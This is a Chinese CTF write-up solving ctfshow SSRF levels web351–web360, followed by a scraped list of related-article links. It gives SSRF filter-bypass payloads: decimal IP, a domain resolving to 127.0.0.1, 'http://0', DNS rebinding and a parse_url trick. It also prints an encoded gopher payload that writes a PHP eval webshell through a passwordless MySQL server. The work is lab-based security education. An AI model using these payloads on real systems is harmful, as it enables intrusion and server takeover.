文章目录

  • 认识SSRF
  • web351
  • web352
  • web353
  • web354
  • web355
  • web356
  • web357
  • web358
  • web359、web360

认识SSRF

浅谈SSRF漏洞

SSRF详解

SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。

web351

可以访问flag.php页面,访问后提示非本地用户禁止访问,所以要用ssrf来本地访问

url=http://localhost/flag.php

web352

依旧是flag.php,但过滤了127.0.0.1和localhost。使用ip转数字

在线IP地址转Int数字、Int数字转IP地址

url=http://2130706433/flag.php

web353

/localhost|127\.0\.|\。/i

不影响之前的payload

url=http://2130706433/flag.php

web354

/localhost|1|0|。/

专门过滤了1和0。

找到一个A记录是127.0.0.1(http://sudo.cc/),然后把那个网站域名改成payload里的url

url=http://sudo.cc/flag.php

web355

这里要求strlen($host)<=5

在百度127.0.0.1又可写成什么的时候,我发现了这个本机ip、127.0.0.1和0.0.0.0区别

既然全零地址是表示任意主机,我就想试一下0是不是可以代表0.0.0.0

然后尝试本地访问一下http://0/,他给我跳转到了https://0.0.0.0/

这样来说应该可以,于是尝试构造payload,成功

url=http://0/flag.php

web356

这一次(strlen($host)<=3),那就用上面的payload

url=http://0/flag.php

web357

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {die('ip!');
}echo file_get_contents($_POST['url']);
}
else{die('scheme');
}

if判断里的:

  • FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP
  • FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP
  • FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP (比如 192.168.0.1)
  • FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值。

DNS重绑定(DNS-Rebinding)漏洞:浅谈DNS重绑定漏洞

去http://ceye.io/注册一个账号,登录后会看到分配了一个域名

添加个DNS Rebinding为任意ip,再添加一个为127.0.0.1,否则payload打过去会直接显示127.0.0.1 ip!

然后POST:(记得在分配的域名前面加个r.)

url=http://r.xxxxxx.ceye.io/flag.php

然后多POST几次就可以了

web358

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){echo file_get_contents($url);
}

这里的考到的是parse_url解析问题,参考文章:parse_url小结

http://ctf.@0/flag.php?show

web359、web360

打无密码的mysql

这里用之前做代码审计的时候用到的工具gopherus(https://github.com/tarunkant/Gopherus)

写一句话进去

然后找一下传参的点

这里有个点是需要再对gopher://127.0.0.1:3306/_后面的进行url编码,我就就直接用记事本替换了(把%替换成%25)

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2547%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%2520%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

然后打returl

web360打redis,把工具后面的mysql改成层redis即可

记得再url编码一次。

ctfshow SSRF web351-web360 wp相关推荐

  1. ctfshow SSRF web351~360

    web 351 知识点:http伪协议访问内网文件 用http伪协议访问内网的flag.php,或者利用file伪协议读取flag.php的源码. url=http://127.0.0.1/flag. ...

  2. CTFShow“萌心区”WP(上)

    CTFShow "萌心区"WP详解(上) 萌新认证 萌新_密码1 萌新_密码2 萌新_密码3 萌新_密码4 隐写1 隐写2 萌新_隐写2 萌新_隐写3 萌新_隐写4 萌新_隐写5 ...

  3. ctfshow—2023愚人杯wp

    ctfshow-2023愚人杯wp 热身 热身 100 愚人杯比赛秉承欢乐.有爱.进取的精神 在群里师傅热心帮助下,已经开始第三届比赛啦! 欢迎各位师傅参加,希望大家玩的开心,比赛题目可以自由讨论.但 ...

  4. CTFshow SSRF

    目录 CTFshow SSRF 前言 简介 危害 利用方式 web351-无过滤 web352-过滤localhost和127.0.0.1和url的[scheme] IP地址进制转换 本地回环的其他表 ...

  5. CTFshow SSRF(web351-360)

    目录 web351 思路 题解 web352 思路 题解 web353 web354 思路 题解 web355 思路 题解 web356 思路 题解 web357 思路 题解 web358 思路 题解 ...

  6. CTFshow_Web_SSRF——web351~web360(除354、357)

    文章目录 前言 一.知识点 Ⅰ.SSRF攻击点 Ⅱ.gopher协议 二.题解 web351 web352.353 web355 web356 web358 web359 web360 完 前言 35 ...

  7. CTFshow 击剑杯 部分WP

    摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...

  8. ctfshow sql注入 web171-web253 wp

    文章目录 参考文章 sql注入 web171 web172 web173 web174 web175 解法一 解法二 web176 web177 web178 web179 web180-web182 ...

  9. CTFshow单身杯 部分wp

    前言:不会吧不会吧不会有人520521不约会打比赛吧 文章目录 1.单身杯热身题目 2.misc签到 3.没大没小的串串 4.任性老板 5.蛤壳雪茄-1 6.蛤壳雪茄-2 7.The Dancing ...

最新文章

  1. HBase 1.1.2 优化插入 Region预分配
  2. windows 系统监视器 以及建议阀值
  3. java web 自定义标签_JavaWeb学习——自定义标签
  4. java 数组处理_JAVA操作数组
  5. mysql 8 免安装版 下载及配置
  6. cuda-gdb 调试python中的module/cu文件
  7. 3dmax蒙皮详细教程
  8. Java面试题及答案整理(2021最新版)
  9. 观察:家乡的、身边的真实互联网
  10. 阿里云存储开通与使用
  11. java根据出生年月计算年龄
  12. 备案的是域名还是服务器?
  13. QuerySet,本质上是一个给定的模型的对象列表
  14. 天文观测理论——已知像素大小、焦距,求像素分辨率
  15. 保护FTP和SFTP服务器的10个基本技巧
  16. 中国大数据分析行业研究报告
  17. 589. N 叉树的前序遍历(javascript)589. N-ary Tree Preorder Traversal
  18. QT-磨砂玻璃效果实现
  19. Unitary matrix 幺正矩阵
  20. 从零在FPG上实现OFDM(一)

热门文章

  1. 【学习笔记】URL和DOI是什么?有什么区别?
  2. Linux系统命令行的符号含义
  3. python如何从文本中提取数据_如何从文本文件中提取数据?
  4. 如何将前端代码写的优雅?
  5. java 网络爬虫_如何用Java实现网络爬虫
  6. 期末安卓习题--第二章
  7. free ***是什么
  8. android qq1像素页面,Android QQ空间1.2体验
  9. 【Introduction】人类大脑
  10. OpenNi学习笔记